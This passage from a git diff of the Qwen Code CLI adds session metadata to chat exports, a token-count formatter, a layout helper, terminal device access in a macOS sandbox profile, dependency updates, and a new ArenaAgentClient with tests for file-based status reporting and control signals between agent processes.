100644 --- a/packages/cli/src/ui/utils/export/formatters/html.ts +++ b/packages/cli/src/ui/utils/export/formatters/html.ts @@ -36,6 +36,7 @@ export function injectDataIntoHtmlTemplate( sessionId: string; startTime: string; messages: unknown[]; + metadata?: unknown; }, ): string { const jsonData = JSON.stringify(data, null, 2); diff --git a/packages/cli/src/ui/utils/export/formatters/jsonl.ts b/packages/cli/src/ui/utils/export/formatters/jsonl.ts index 57dcfeb8b..4de132bb1 100644 --- a/packages/cli/src/ui/utils/export/formatters/jsonl.ts +++ b/packages/cli/src/ui/utils/export/formatters/jsonl.ts @@ -12,15 +12,60 @@ import type { ExportSessionData } from '../types.js'; */ export function toJsonl(sessionData: ExportSessionData): string { const lines: string[] = []; + const sourceMetadata = sessionData.metadata; // Add session metadata as the first line - lines.push( - JSON.stringify({ - type: 'session_metadata', - sessionId: sessionData.sessionId, - startTime: sessionData.startTime, - }), - ); + const metadata: Record = { + type: 'session_metadata', + sessionId: sessionData.sessionId, + startTime: sessionData.startTime, + }; + + // Add all metadata fields if available + if (sourceMetadata?.exportTime) { + metadata['exportTime'] = sourceMetadata.exportTime; + } + if (sourceMetadata?.cwd) { + metadata['cwd'] = sourceMetadata.cwd; + } + if (sourceMetadata?.gitRepo) { + metadata['gitRepo'] = sourceMetadata.gitRepo; + } + if (sourceMetadata?.gitBranch) { + metadata['gitBranch'] = sourceMetadata.gitBranch; + } + if (sourceMetadata?.model) { + metadata['model'] = sourceMetadata.model; + } + if (sourceMetadata?.channel) { + metadata['channel'] = sourceMetadata.channel; + } + if (sourceMetadata?.promptCount !== undefined) { + metadata['promptCount'] = sourceMetadata.promptCount; + } + if (sourceMetadata?.contextUsagePercent !== undefined) { + metadata['contextUsagePercent'] = sourceMetadata.contextUsagePercent; + } + if (sourceMetadata?.contextWindowSize !== undefined) { + metadata['contextWindowSize'] = sourceMetadata.contextWindowSize; + } + if (sourceMetadata?.totalTokens !== undefined) { + metadata['totalTokens'] = sourceMetadata.totalTokens; + } + if (sourceMetadata?.filesWritten !== undefined) { + metadata['filesWritten'] = sourceMetadata.filesWritten; + } + if (sourceMetadata?.linesAdded !== undefined) { + metadata['linesAdded'] = sourceMetadata.linesAdded; + } + if (sourceMetadata?.linesRemoved !== undefined) { + metadata['linesRemoved'] = sourceMetadata.linesRemoved; + } + if (sourceMetadata?.uniqueFiles && sourceMetadata.uniqueFiles.length > 0) { + metadata['uniqueFiles'] = sourceMetadata.uniqueFiles; + } + + lines.push(JSON.stringify(metadata)); // Add each message as a separate line for (const message of sessionData.messages) { diff --git a/packages/cli/src/ui/utils/export/formatters/markdown.ts b/packages/cli/src/ui/utils/export/formatters/markdown.ts index deb520cad..6ee18a754 100644 --- a/packages/cli/src/ui/utils/export/formatters/markdown.ts +++ b/packages/cli/src/ui/utils/export/formatters/markdown.ts @@ -11,12 +11,82 @@ import type { ExportSessionData, ExportMessage } from '../types.js'; */ export function toMarkdown(sessionData: ExportSessionData): string { const lines: string[] = []; + const metadata = sessionData.metadata; // Add header with metadata lines.push('# Chat Session Export\n'); lines.push(`- **Session ID**: \`${sanitizeText(sessionData.sessionId)}\``); lines.push(`- **Start Time**: ${sanitizeText(sessionData.startTime)}`); - lines.push(`- **Exported**: ${new Date().toISOString()}`); + lines.push( + `- **Exported**: ${sanitizeText(metadata?.exportTime ?? new Date().toISOString())}`, + ); + + lines.push(''); + + // Add context info + if (metadata?.cwd) { + lines.push(`- **Working Directory**: \`${sanitizeText(metadata.cwd)}\``); + } + if (metadata?.gitRepo) { + lines.push(`- **Git Repository**: ${sanitizeText(metadata.gitRepo)}`); + } + if (metadata?.gitBranch) { + lines.push(`- **Git Branch**: \`${sanitizeText(metadata.gitBranch)}\``); + } + + lines.push(''); + + // Add model info + if (metadata?.model) { + lines.push(`- **Model**: ${sanitizeText(metadata.model)}`); + } + if (metadata?.channel) { + lines.push(`- **Channel**: ${sanitizeText(metadata.channel)}`); + } + if (metadata?.promptCount !== undefined) { + lines.push(`- **Prompt Count**: ${metadata.promptCount}`); + } + + lines.push(''); + + // Add token stats + if (metadata?.totalTokens !== undefined) { + lines.push(`- **Total Tokens**: ${metadata.totalTokens}`); + } + if (metadata?.contextWindowSize !== undefined) { + lines.push(`- **Context Window Size**: ${metadata.contextWindowSize}`); + } + if (metadata?.contextUsagePercent !== undefined) { + lines.push(`- **Context Usage**: ${metadata.contextUsagePercent}%`); + } + + lines.push(''); + + // Add file operation stats + if (metadata?.filesWritten !== undefined) { + lines.push(`- **Files Written**: ${metadata.filesWritten}`); + } + if (metadata?.linesAdded !== undefined) { + lines.push(`- **Lines Added**: ${metadata.linesAdded}`); + } + if (metadata?.linesRemoved !== undefined) { + lines.push(`- **Lines Removed**: ${metadata.linesRemoved}`); + } + + // Add unique files list if available + if (metadata?.uniqueFiles && metadata.uniqueFiles.length > 0) { + lines.push(''); + lines.push('
'); + lines.push( + `Unique Files Referenced (${metadata.uniqueFiles.length})`, + ); + lines.push(''); + for (const file of metadata.uniqueFiles) { + lines.push(`- \`${sanitizeText(file)}\``); + } + lines.push('
'); + } + lines.push('\n---\n'); // Process each message diff --git a/packages/cli/src/ui/utils/export/normalize.ts b/packages/cli/src/ui/utils/export/normalize.ts index c2236dd3c..cf9f80cdc 100644 --- a/packages/cli/src/ui/utils/export/normalize.ts +++ b/packages/cli/src/ui/utils/export/normalize.ts @@ -28,6 +28,14 @@ export function normalizeSessionData( } }); + // Build index of assistant messages by uuid for usageMetadata merging + const assistantMessageIndexByUuid = new Map(); + normalized.forEach((message, index) => { + if (message.type === 'assistant') { + assistantMessageIndexByUuid.set(message.uuid, index); + } + }); + // Merge tool result information into tool call messages for (const record of originalRecords) { if (record.type !== 'tool_result') continue; @@ -58,6 +66,20 @@ export function normalizeSessionData( mergeToolCallData(existingMessage.toolCall, toolCallMessage.toolCall); } + // Merge usageMetadata from assistant records + for (const record of originalRecords) { + if (record.type !== 'assistant') continue; + if (!record.usageMetadata) continue; + + const existingIndex = assistantMessageIndexByUuid.get(record.uuid); + if (existingIndex !== undefined) { + // Only set if not already present from collect phase + if (!normalized[existingIndex].usageMetadata) { + normalized[existingIndex].usageMetadata = record.usageMetadata; + } + } + } + return { ...sessionData, messages: normalized, diff --git a/packages/cli/src/ui/utils/export/types.ts b/packages/cli/src/ui/utils/export/types.ts index e71612615..3148fb386 100644 --- a/packages/cli/src/ui/utils/export/types.ts +++ b/packages/cli/src/ui/utils/export/types.ts @@ -4,6 +4,8 @@ * SPDX-License-Identifier: Apache-2.0 */ +import type { GenerateContentResponseUsageMetadata } from '@google/genai'; + /** * Universal export message format - SSOT for all export formats. * This is format-agnostic and contains all information needed for any export type. @@ -25,6 +27,9 @@ export interface ExportMessage { /** Model used for assistant messages */ model?: string; + /** Token usage for this message (mainly for assistant messages) */ + usageMetadata?: GenerateContentResponseUsageMetadata; + /** For tool_call messages */ toolCall?: { toolCallId: string; @@ -44,6 +49,44 @@ export interface ExportMessage { }; } +/** + * Metadata for export session - contains aggregated statistics and session context. + */ +export interface ExportMetadata { + /** Session ID */ + sessionId: string; + /** ISO timestamp when session started */ + startTime: string; + /** Export timestamp */ + exportTime: string; + /** Current working directory */ + cwd: string; + /** Git repository name, if available */ + gitRepo?: string; + /** Git branch name, if available */ + gitBranch?: string; + /** Model used in the session */ + model?: string; + /** Channel/source identifier */ + channel?: string; + /** Number of user prompts in the session */ + promptCount: number; + /** Context window utilization percentage (0-100) */ + contextUsagePercent?: number; + /** Context window size in tokens (used for calculating percentage) */ + contextWindowSize?: number; + /** Total tokens used (prompt + completion) */ + totalTokens?: number; + /** Number of files written/edited */ + filesWritten?: number; + /** Lines of code added */ + linesAdded?: number; + /** Lines of code removed */ + linesRemoved?: number; + /** Unique files referenced in the session (written files only) */ + uniqueFiles: string[]; +} + /** * Complete export session data - the single source of truth. */ @@ -51,4 +94,6 @@ export interface ExportSessionData { sessionId: string; startTime: string; messages: ExportMessage[]; + /** Session metadata and statistics */ + metadata?: ExportMetadata; } diff --git a/packages/cli/src/ui/utils/formatters.test.ts b/packages/cli/src/ui/utils/formatters.test.ts index 34bf67e26..09173e10e 100644 --- a/packages/cli/src/ui/utils/formatters.test.ts +++ b/packages/cli/src/ui/utils/formatters.test.ts @@ -9,6 +9,7 @@ import { formatDuration, formatMemoryUsage, formatRelativeTime, + formatTokenCount, } from './formatters.js'; describe('formatters', () => { @@ -154,4 +155,25 @@ describe('formatters', () => { expect(formatDuration(-100)).toBe('0s'); }); }); + + describe('formatTokenCount', () => { + it('should display exact number for counts less than 1000', () => { + expect(formatTokenCount(0)).toBe('0'); + expect(formatTokenCount(100)).toBe('100'); + expect(formatTokenCount(847)).toBe('847'); + expect(formatTokenCount(999)).toBe('999'); + }); + + it('should display with k suffix and one decimal for counts 1000-9999', () => { + expect(formatTokenCount(1000)).toBe('1.0k'); + expect(formatTokenCount(5400)).toBe('5.4k'); + expect(formatTokenCount(9999)).toBe('10.0k'); + }); + + it('should display with k suffix without decimal for counts 10000 and above', () => { + expect(formatTokenCount(10000)).toBe('10k'); + expect(formatTokenCount(15000)).toBe('15k'); + expect(formatTokenCount(100000)).toBe('100k'); + }); + }); }); diff --git a/packages/cli/src/ui/utils/formatters.ts b/packages/cli/src/ui/utils/formatters.ts index b65cefe18..38afaaa30 100644 --- a/packages/cli/src/ui/utils/formatters.ts +++ b/packages/cli/src/ui/utils/formatters.ts @@ -55,6 +55,16 @@ export const formatRelativeTime = (timestamp: number): string => { return 'just now'; }; +export const formatTokenCount = (count: number): string => { + if (count < 1000) { + return `${count}`; + } + if (count < 10000) { + return `${(count / 1000).toFixed(1)}k`; + } + return `${Math.floor(count / 1000)}k`; +}; + export const formatDuration = (milliseconds: number): string => { if (milliseconds <= 0) { return '0s'; diff --git a/packages/cli/src/ui/utils/layoutUtils.ts b/packages/cli/src/ui/utils/layoutUtils.ts new file mode 100644 index 000000000..208babcfc --- /dev/null +++ b/packages/cli/src/ui/utils/layoutUtils.ts @@ -0,0 +1,40 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Shared layout calculation utilities for the terminal UI. + */ + +/** + * Calculate the widths for the input prompt area based on terminal width. + * + * Returns the content width (for the text buffer), the total container width + * (including border + padding + prefix), the suggestions dropdown width, + * and the frame overhead constant. + */ +export const calculatePromptWidths = (terminalWidth: number) => { + const widthFraction = 0.9; + const FRAME_PADDING_AND_BORDER = 4; // Border (2) + padding (2) + const PROMPT_PREFIX_WIDTH = 2; // '> ' or '! ' + const MIN_CONTENT_WIDTH = 2; + + const innerContentWidth = + Math.floor(terminalWidth * widthFraction) - + FRAME_PADDING_AND_BORDER - + PROMPT_PREFIX_WIDTH; + + const inputWidth = Math.max(MIN_CONTENT_WIDTH, innerContentWidth); + const FRAME_OVERHEAD = FRAME_PADDING_AND_BORDER + PROMPT_PREFIX_WIDTH; + const containerWidth = inputWidth + FRAME_OVERHEAD; + const suggestionsWidth = Math.max(20, Math.floor(terminalWidth * 1.0)); + + return { + inputWidth, + containerWidth, + suggestionsWidth, + frameOverhead: FRAME_OVERHEAD, + } as const; +}; diff --git a/packages/cli/src/utils/sandbox-macos-permissive-open.sb b/packages/cli/src/utils/sandbox-macos-permissive-open.sb index b0da94f7f..bc2087481 100644 --- a/packages/cli/src/utils/sandbox-macos-permissive-open.sb +++ b/packages/cli/src/utils/sandbox-macos-permissive-open.sb @@ -22,4 +22,6 @@ (literal "/dev/stdout") (literal "/dev/stderr") (literal "/dev/null") -) \ No newline at end of file + (literal "/dev/ptmx") + (regex #"^/dev/ttys[0-9]*$") +) diff --git a/packages/core/package.json b/packages/core/package.json index c66f51a93..cca5ef21c 100644 --- a/packages/core/package.json +++ b/packages/core/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/qwen-code-core", - "version": "0.12.3", + "version": "0.13.0", "description": "Qwen Code Core", "repository": { "type": "git", @@ -25,6 +25,7 @@ "dependencies": { "@anthropic-ai/sdk": "^0.36.1", "@google/genai": "1.30.0", + "@iarna/toml": "^2.2.5", "@modelcontextprotocol/sdk": "^1.25.1", "@opentelemetry/api": "^1.9.0", "@opentelemetry/exporter-logs-otlp-grpc": "^0.203.0", @@ -37,7 +38,6 @@ "@opentelemetry/sdk-node": "^0.203.0", "@types/html-to-text": "^9.0.4", "@xterm/headless": "5.5.0", - "@iarna/toml": "^2.2.5", "ajv": "^8.17.1", "ajv-formats": "^3.0.0", "async-mutex": "^0.5.0", @@ -46,6 +46,7 @@ "chokidar": "^4.0.3", "diff": "^7.0.0", "dotenv": "^17.1.0", + "extract-zip": "^2.0.1", "fast-levenshtein": "^2.0.6", "fast-uri": "^3.0.6", "fdir": "^6.4.6", @@ -61,15 +62,15 @@ "mnemonist": "^0.40.3", "open": "^10.1.2", "openai": "5.11.0", - "prompts": "^2.4.2", "picomatch": "^4.0.1", + "prompts": "^2.4.2", "shell-quote": "^1.8.3", "simple-git": "^3.28.0", "strip-ansi": "^7.1.0", "tar": "^7.5.2", - "extract-zip": "^2.0.1", "undici": "^6.22.0", "uuid": "^9.0.1", + "web-tree-sitter": "^0.24.7", "ws": "^8.18.0" }, "optionalDependencies": { @@ -87,10 +88,11 @@ "@types/fast-levenshtein": "^0.0.4", "@types/minimatch": "^5.1.2", "@types/picomatch": "^4.0.1", - "@types/ws": "^8.5.10", - "@types/tar": "^6.1.13", "@types/prompts": "^2.4.9", + "@types/tar": "^6.1.13", + "@types/ws": "^8.5.10", "msw": "^2.3.4", + "tree-sitter-wasms": "^0.1.13", "typescript": "^5.3.3", "vitest": "^3.1.1" }, diff --git a/packages/core/src/agents/arena/ArenaAgentClient.test.ts b/packages/core/src/agents/arena/ArenaAgentClient.test.ts new file mode 100644 index 000000000..6ab61039c --- /dev/null +++ b/packages/core/src/agents/arena/ArenaAgentClient.test.ts @@ -0,0 +1,568 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as os from 'node:os'; +import { ArenaAgentClient } from './ArenaAgentClient.js'; +import { safeAgentId } from './types.js'; +import type { ArenaControlSignal } from './types.js'; +import { uiTelemetryService } from '../../telemetry/uiTelemetry.js'; +import type { SessionMetrics } from '../../telemetry/uiTelemetry.js'; +import { ToolCallDecision } from '../../telemetry/tool-call-decision.js'; + +const createMockMetrics = ( + overrides: Partial<{ + totalRequests: number; + totalTokens: number; + promptTokens: number; + candidatesTokens: number; + totalLatencyMs: number; + totalCalls: number; + totalSuccess: number; + totalFail: number; + }> = {}, +): SessionMetrics => ({ + models: { + 'test-model': { + api: { + totalRequests: overrides.totalRequests ?? 0, + totalErrors: 0, + totalLatencyMs: overrides.totalLatencyMs ?? 0, + }, + tokens: { + prompt: overrides.promptTokens ?? 0, + candidates: overrides.candidatesTokens ?? 0, + total: overrides.totalTokens ?? 0, + cached: 0, + thoughts: 0, + tool: 0, + }, + }, + }, + tools: { + totalCalls: overrides.totalCalls ?? 0, + totalSuccess: overrides.totalSuccess ?? 0, + totalFail: overrides.totalFail ?? 0, + totalDurationMs: 0, + totalDecisions: { + [ToolCallDecision.ACCEPT]: 0, + [ToolCallDecision.REJECT]: 0, + [ToolCallDecision.MODIFY]: 0, + [ToolCallDecision.AUTO_ACCEPT]: 0, + }, + byName: {}, + }, + files: { + totalLinesAdded: 0, + totalLinesRemoved: 0, + }, +}); + +describe('ArenaAgentClient', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = await fs.mkdtemp(path.join(os.tmpdir(), 'arena-reporter-test-')); + vi.spyOn(uiTelemetryService, 'getMetrics').mockReturnValue( + createMockMetrics(), + ); + }); + + afterEach(async () => { + vi.restoreAllMocks(); + try { + await fs.rm(tempDir, { recursive: true, force: true }); + } catch { + // Ignore cleanup errors + } + }); + + describe('create() factory', () => { + it('should return null when ARENA_AGENT_ID is not set', () => { + const original = process.env['ARENA_AGENT_ID']; + const originalSession = process.env['ARENA_SESSION_ID']; + const originalDir = process.env['ARENA_SESSION_DIR']; + delete process.env['ARENA_AGENT_ID']; + delete process.env['ARENA_SESSION_ID']; + delete process.env['ARENA_SESSION_DIR']; + + const reporter = ArenaAgentClient.create(); + expect(reporter).toBeNull(); + + // Restore + if (original !== undefined) { + process.env['ARENA_AGENT_ID'] = original; + } + if (originalSession !== undefined) { + process.env['ARENA_SESSION_ID'] = originalSession; + } + if (originalDir !== undefined) { + process.env['ARENA_SESSION_DIR'] = originalDir; + } + }); + + it('should return null when ARENA_SESSION_ID is not set', () => { + const originalAgent = process.env['ARENA_AGENT_ID']; + const originalSession = process.env['ARENA_SESSION_ID']; + const originalDir = process.env['ARENA_SESSION_DIR']; + + process.env['ARENA_AGENT_ID'] = 'test-agent'; + delete process.env['ARENA_SESSION_ID']; + process.env['ARENA_SESSION_DIR'] = tempDir; + + const reporter = ArenaAgentClient.create(); + expect(reporter).toBeNull(); + + // Restore + if (originalAgent !== undefined) { + process.env['ARENA_AGENT_ID'] = originalAgent; + } else { + delete process.env['ARENA_AGENT_ID']; + } + if (originalSession !== undefined) { + process.env['ARENA_SESSION_ID'] = originalSession; + } + if (originalDir !== undefined) { + process.env['ARENA_SESSION_DIR'] = originalDir; + } else { + delete process.env['ARENA_SESSION_DIR']; + } + }); + + it('should return null when ARENA_SESSION_DIR is not set', () => { + const originalAgent = process.env['ARENA_AGENT_ID']; + const originalSession = process.env['ARENA_SESSION_ID']; + const originalDir = process.env['ARENA_SESSION_DIR']; + + process.env['ARENA_AGENT_ID'] = 'test-agent'; + process.env['ARENA_SESSION_ID'] = 'test-session'; + delete process.env['ARENA_SESSION_DIR']; + + const reporter = ArenaAgentClient.create(); + expect(reporter).toBeNull(); + + // Restore + if (originalAgent !== undefined) { + process.env['ARENA_AGENT_ID'] = originalAgent; + } else { + delete process.env['ARENA_AGENT_ID']; + } + if (originalSession !== undefined) { + process.env['ARENA_SESSION_ID'] = originalSession; + } else { + delete process.env['ARENA_SESSION_ID']; + } + if (originalDir !== undefined) { + process.env['ARENA_SESSION_DIR'] = originalDir; + } else { + delete process.env['ARENA_SESSION_DIR']; + } + }); + + it('should return an instance when all env vars are set', () => { + const originalAgent = process.env['ARENA_AGENT_ID']; + const originalSession = process.env['ARENA_SESSION_ID']; + const originalDir = process.env['ARENA_SESSION_DIR']; + + process.env['ARENA_AGENT_ID'] = 'test-agent'; + process.env['ARENA_SESSION_ID'] = 'test-session'; + process.env['ARENA_SESSION_DIR'] = tempDir; + + const reporter = ArenaAgentClient.create(); + expect(reporter).toBeInstanceOf(ArenaAgentClient); + + // Restore + if (originalAgent !== undefined) { + process.env['ARENA_AGENT_ID'] = originalAgent; + } else { + delete process.env['ARENA_AGENT_ID']; + } + if (originalSession !== undefined) { + process.env['ARENA_SESSION_ID'] = originalSession; + } else { + delete process.env['ARENA_SESSION_ID']; + } + if (originalDir !== undefined) { + process.env['ARENA_SESSION_DIR'] = originalDir; + } else { + delete process.env['ARENA_SESSION_DIR']; + } + }); + }); + + describe('init()', () => { + it('should create the agents/ and control/ directories', async () => { + const reporter = new ArenaAgentClient('agent-1', tempDir); + await reporter.init(); + + const agentsDir = path.join(tempDir, 'agents'); + const controlDir = path.join(tempDir, 'control'); + const agentsStat = await fs.stat(agentsDir); + const controlStat = await fs.stat(controlDir); + expect(agentsStat.isDirectory()).toBe(true); + expect(controlStat.isDirectory()).toBe(true); + }); + + it('should be idempotent', async () => { + const reporter = new ArenaAgentClient('agent-1', tempDir); + await reporter.init(); + await reporter.init(); // Should not throw + + const agentsDir = path.join(tempDir, 'agents'); + const stat = await fs.stat(agentsDir); + expect(stat.isDirectory()).toBe(true); + }); + }); + + describe('updateStatus()', () => { + it('should write per-agent status file with stats from telemetry', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue( + createMockMetrics({ + totalRequests: 3, + totalTokens: 1500, + promptTokens: 1000, + candidatesTokens: 500, + totalCalls: 7, + totalSuccess: 6, + totalFail: 1, + }), + ); + + await reporter.updateStatus('Editing files'); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.agentId).toBe(agentId); + expect(content.status).toBe('running'); + expect(content.rounds).toBe(3); + expect(content.currentActivity).toBe('Editing files'); + expect(content.stats.totalTokens).toBe(1500); + expect(content.stats.inputTokens).toBe(1000); + expect(content.stats.outputTokens).toBe(500); + expect(content.stats.toolCalls).toBe(7); + expect(content.stats.successfulToolCalls).toBe(6); + expect(content.stats.failedToolCalls).toBe(1); + expect(content.finalSummary).toBeNull(); + expect(content.error).toBeNull(); + expect(content.updatedAt).toBeTypeOf('number'); + }); + + it('should perform atomic write (no partial reads)', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + // Write status multiple times rapidly + const promises = []; + for (let i = 0; i < 10; i++) { + promises.push(reporter.updateStatus()); + } + await Promise.all(promises); + + // The file should be valid JSON (no corruption from concurrent writes) + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + expect(content.agentId).toBe(agentId); + expect(content.status).toBe('running'); + }); + + it('should reflect latest telemetry on each call', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + // First update + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue( + createMockMetrics({ + totalRequests: 1, + totalTokens: 100, + totalCalls: 5, + }), + ); + await reporter.updateStatus(); + + // Second update with updated telemetry + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue( + createMockMetrics({ + totalRequests: 2, + totalTokens: 200, + totalCalls: 8, + }), + ); + await reporter.updateStatus(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.rounds).toBe(2); + expect(content.stats.totalTokens).toBe(200); + expect(content.stats.toolCalls).toBe(8); + }); + + it('should auto-initialize if not yet initialized', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + // Skip init() call + + await reporter.updateStatus(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + expect(content.agentId).toBe(agentId); + }); + }); + + describe('checkControlSignal()', () => { + it('should return null when no control file exists', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + const signal = await reporter.checkControlSignal(); + expect(signal).toBeNull(); + }); + + it('should read and delete control file', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + // Write a control signal + const controlSignal: ArenaControlSignal = { + type: 'shutdown', + reason: 'User cancelled', + timestamp: Date.now(), + }; + const controlPath = path.join( + tempDir, + 'control', + `${safeAgentId(agentId)}.json`, + ); + await fs.writeFile(controlPath, JSON.stringify(controlSignal), 'utf-8'); + + // Read it + const signal = await reporter.checkControlSignal(); + expect(signal).not.toBeNull(); + expect(signal!.type).toBe('shutdown'); + expect(signal!.reason).toBe('User cancelled'); + + // File should be deleted (consumed) + await expect(fs.access(controlPath)).rejects.toThrow(); + }); + + it('should return null on subsequent reads (consume-once)', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + // Write a control signal + const controlSignal: ArenaControlSignal = { + type: 'cancel', + reason: 'Timeout', + timestamp: Date.now(), + }; + const controlPath = path.join( + tempDir, + 'control', + `${safeAgentId(agentId)}.json`, + ); + await fs.writeFile(controlPath, JSON.stringify(controlSignal), 'utf-8'); + + // First read should return the signal + const first = await reporter.checkControlSignal(); + expect(first).not.toBeNull(); + + // Second read should return null + const second = await reporter.checkControlSignal(); + expect(second).toBeNull(); + }); + }); + + describe('reportCompleted()', () => { + it('should write status with completed state and optional summary', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + await reporter.reportCompleted('Successfully implemented feature X'); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.status).toBe('completed'); + expect(content.finalSummary).toBe('Successfully implemented feature X'); + expect(content.error).toBeNull(); + }); + + it('should write status with idle state and no summary', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + await reporter.reportCompleted(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.status).toBe('completed'); + expect(content.finalSummary).toBeNull(); + expect(content.error).toBeNull(); + }); + }); + + describe('stats aggregation and wall-clock durationMs', () => { + it('should aggregate multi-model stats and use wall-clock durationMs', async () => { + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue({ + models: { + 'model-a': { + api: { + totalRequests: 3, + totalErrors: 0, + totalLatencyMs: 1000, + }, + tokens: { + prompt: 100, + candidates: 50, + total: 150, + cached: 0, + thoughts: 0, + tool: 0, + }, + }, + 'model-b': { + api: { + totalRequests: 2, + totalErrors: 1, + totalLatencyMs: 500, + }, + tokens: { + prompt: 200, + candidates: 100, + total: 300, + cached: 0, + thoughts: 0, + tool: 0, + }, + }, + }, + tools: { + totalCalls: 10, + totalSuccess: 8, + totalFail: 2, + totalDurationMs: 2000, + totalDecisions: { + [ToolCallDecision.ACCEPT]: 0, + [ToolCallDecision.REJECT]: 0, + [ToolCallDecision.MODIFY]: 0, + [ToolCallDecision.AUTO_ACCEPT]: 0, + }, + byName: {}, + }, + files: { totalLinesAdded: 0, totalLinesRemoved: 0 }, + }); + + const reporter = new ArenaAgentClient('model-a', tempDir); + await reporter.init(); + await reporter.updateStatus(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId('model-a')}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.stats.rounds).toBe(5); + expect(content.stats.totalTokens).toBe(450); + expect(content.stats.inputTokens).toBe(300); + expect(content.stats.outputTokens).toBe(150); + expect(content.stats.toolCalls).toBe(10); + expect(content.stats.successfulToolCalls).toBe(8); + expect(content.stats.failedToolCalls).toBe(2); + // durationMs should be wall-clock time, not API latency sum (1500) + expect(content.stats.durationMs).toBeGreaterThanOrEqual(0); + expect(content.stats.durationMs).toBeLessThan(5000); + }); + + it('should return zeros when no models exist', async () => { + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue( + createMockMetrics(), + ); + // Override with empty models + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue({ + ...createMockMetrics(), + models: {}, + }); + + const reporter = new ArenaAgentClient('model-a', tempDir); + await reporter.init(); + await reporter.updateStatus(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId('model-a')}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.stats.rounds).toBe(0); + expect(content.stats.totalTokens).toBe(0); + expect(content.stats.inputTokens).toBe(0); + expect(content.stats.outputTokens).toBe(0); + // durationMs is wall-clock, so still non-negative even with no models + expect(content.stats.durationMs).toBeGreaterThanOrEqual(0); + }); + }); + + describe('safeAgentId()', () => { + it('should pass through typical model IDs unchanged', () => { + expect(safeAgentId('qwen-coder-plus')).toBe('qwen-coder-plus'); + }); + + it('should handle IDs without unsafe characters', () => { + expect(safeAgentId('simple-id')).toBe('simple-id'); + }); + + it('should replace slashes with double dashes', () => { + expect(safeAgentId('org/model-name')).toBe('org--model-name'); + }); + + it('should handle multiple unsafe characters', () => { + expect(safeAgentId('a/b\\c:d')).toBe('a--b--c--d'); + }); + }); +}); diff --git a/packages/core/src/agents/arena/ArenaAgentClient.ts b/packages/core/src/agents/arena/ArenaAgentClient.ts new file mode 100644 index 000000000..12780f8de --- /dev/null +++ b/packages/core/src/agents/arena/ArenaAgentClient.ts @@ -0,0 +1,241 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import { createDebugLogger } from '../../utils/debugLogger.js'; +import { isNodeError } from '../../utils/errors.js'; +import { atomicWriteJSON } from '../../utils/atomicFileWrite.js'; +import { uiTelemetryService } from '../../telemetry/uiTelemetry.js'; +import type { + ArenaAgentStats, + ArenaControlSignal, + ArenaStatusFile, +} from './types.js'; +import { safeAgentId } from './types.js'; +import { AgentStatus } from '../runtime/agent-types.js'; + +const debugLogger = createDebugLogger('ARENA_AGENT_CLIENT'); + +const AGENTS_SUBDIR = 'agents'; +const CONTROL_SUBDIR = 'control'; + +/** + * ArenaAgentClient is used by child agent processes to communicate + * their status back to the main ArenaManager process via file-based IPC. + * + * Status files are written to a centralized arena session directory: + * `/agents/.json` + * + * Control signals are read from: + * `/control/.json` + * + * It self-activates based on the ARENA_AGENT_ID environment variable. + * When running outside an Arena session, `ArenaAgentClient.create()` + * returns null. + */ +export class ArenaAgentClient { + private readonly agentsDir: string; + private readonly controlDir: string; + private readonly statusFilePath: string; + private readonly controlFilePath: string; + private readonly startTimeMs: number; + private initialized = false; + + /** + * Static factory - returns an instance if ARENA_AGENT_ID, ARENA_SESSION_ID, + * and ARENA_SESSION_DIR env vars are present, null otherwise. + */ + static create(): ArenaAgentClient | null { + const agentId = 